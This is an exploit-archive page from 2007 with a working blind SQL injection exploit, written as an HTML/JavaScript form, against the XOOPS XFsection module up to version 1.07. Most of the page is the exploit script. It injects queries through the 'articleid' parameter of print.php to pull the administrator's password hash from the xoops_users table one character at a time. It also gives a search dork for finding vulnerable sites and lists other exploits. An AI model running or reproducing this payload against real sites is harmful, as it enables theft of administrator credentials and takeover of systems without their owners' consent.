exploits , vulnerabilities , articles , Xoops Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit

2007-06-15 XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-03 XOOPS Module icontent 1.0 Remote File Inclusion Exploit
2007-04-16 XOOPS Module tsdisplay4xoops 0.1 Remote File Inclusion Vulnerability
2007-04-06 XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit

2007-04-02

Xoops Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit

Rated as : High Risk

<html>
<head>
<title>XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL
Injection Exploit</title>

<script type="text/javascript">

//'===============================================================================================
//'[Script Name: XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL
Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[Dork       : inurl:/modules/xfsection/
//'[S.Page     : http://linux2.ohwada.net/
//'[$$         : Free
//'[Using      : Write Target after Submit Click
//'===============================================================================================


   function nesneyarat() {

 var nesne;
 var tarayici = navigator.appName;

   
     if(tarayici == "Microsoft Internet Explorer"){
 nesne = new ActiveXObject("Microsoft.XMLHTTP");
    }
  else {
 nesne = new XMLHttpRequest();

  }
return nesne;
}

 var http = nesneyarat();



   function islemlink(adresyolla,charyolla) {

genreidim=document.getElementById('genreid').value
file="/modules/xfsection/print.php?articleid=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim +  adresyolla +
karakterim


 

 http.open('get', adres);
 http.onreadystatechange = cevapFonksiyonu;
 http.send(null);
   

}



   function cevapFonksiyonu() {
 if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();

}
}



function yonlendir() {

  if (document.getElementById('mesaj').value.indexOf('<span
style="font-size: large;">', 0) == -1) {
 alert('False');


  }

 if (document.getElementById('mesaj').value.indexOf('<span
style="font-size: large;">', 0) != -1)  {
   alert('TRUEEEEEEE');
   }
 


  }

function dal() {

if (document.getElementById('buton').value == "Test
Character(0)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
   document.getElementById('buton').value = "Test Character(1)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(1)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
   document.getElementById('buton').value = "Test Character(2)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(2)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
   document.getElementById('buton').value = "Test Character(3)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(3)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
   document.getElementById('buton').value = "Test Character(4)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(4)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
   document.getElementById('buton').value = "Test Character(5)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(5)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
   document.getElementById('buton').value = "Test Character(6)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(6)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
   document.getElementById('buton').value = "Test Character(7)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(7)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
   document.getElementById('buton').value = "Test Character(8)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(8)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
   document.getElementById('buton').value = "Test Character(9)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(9)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
   document.getElementById('buton').value = "Test Character(a)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(a)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
   document.getElementById('buton').value = "Test Character(b)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(b)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
   document.getElementById('buton').value = "Test Character(c)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(c)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
   document.getElementById('buton').value = "Test Character(d)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(d)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
   document.getElementById('buton').value = "Test Character(e)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(e)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
   document.getElementById('buton').value = "Test Character(f)"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test
Character(f)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
   document.getElementById('buton').value = "Finished"
 setTimeout("document.getElementById('buton').disabled =
false;",2000);
return false;

 }



  }


</script>

   </head>

 <body bgcolor="#000000">

<center>

<p><b><font face="Verdana" size="2"
color="#008000">XOOPS Module XFsection <= 1.07 (articleid)
BLIND SQL Injection Exploit</font></b></p>

<p></p>
    <b><font face="Arial" size="1"
color="#FF0000">Target:</font><font
face="Arial" size="1"
color="#808080">[http://[target]/</font><font
color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000"
size="2"> </font></b>            
  <input type="text" name="adresim"
size="20" style="background-color: #808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"
value="http://"></p>
<br>
    <b><font face="Arial" size="1"
color="#FF0000"> Path:</font><font
face="Arial" size="1"
color="#808080">[http://[target]/[scriptpath]   
</font></b>
  <input type="text" name="path"
size="20" style="background-color: #808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"
value="/">
  <p>
    <b><font face="Arial" size="1"
color="#FF0000"> Character:</font><font
face="Arial" size="1" color="#808080">[Md5

  Character 1-32]   </font></b>
  <input type="text" name="karakter"
size="20" style="background-color: #808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"
value="1">
</p>
  <p>
    <b><font face="Arial" size="1"
color="#FF0000">Article Id:</font><font
face="Arial" size="1"
color="#808080">[print.php?articleid=]  
</font></b>
  <input type="text" name="genreid"
size="20" style="background-color: #808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"
value="1">
</p>
  <p><input type="submit" value="Test
Character(0)" name="buton"
onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20"
style="visibility:hidden"></textarea> <br>
<p>

<b><font face="Verdana" size="2"
color="#008000">ajann</font></b></p>
</p>
</center>


 </body>
 </html>
securitydot.net - 2007-04-02

Exploits - newest 10 RSS | More

2007-06-15 37829 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 19641 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23354 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 19674 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12086 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10283 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12478 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10348 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22315 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 10844 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit